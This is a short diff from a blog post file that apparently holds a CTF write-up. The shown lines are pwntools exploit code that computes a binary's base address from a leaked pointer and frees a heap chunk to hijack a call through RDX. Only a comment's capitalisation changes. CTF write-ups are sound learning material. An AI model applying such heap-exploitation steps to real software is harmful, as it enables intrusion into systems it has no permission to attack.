dplastico/dplastico.github.io/_posts/2022-05-25-Apocalypse_ctf.md

 elf.address = leak2-0x15e2
 log.info(f"base = {hex(elf.address)}")

-#free 0x60 chunk with the "call to rdx on 0x48"
+#free 0x60 chunk with the "call to RDX on 0x48"
 r.sendline(b"4")
 r.recvuntil(b" do you want to do?")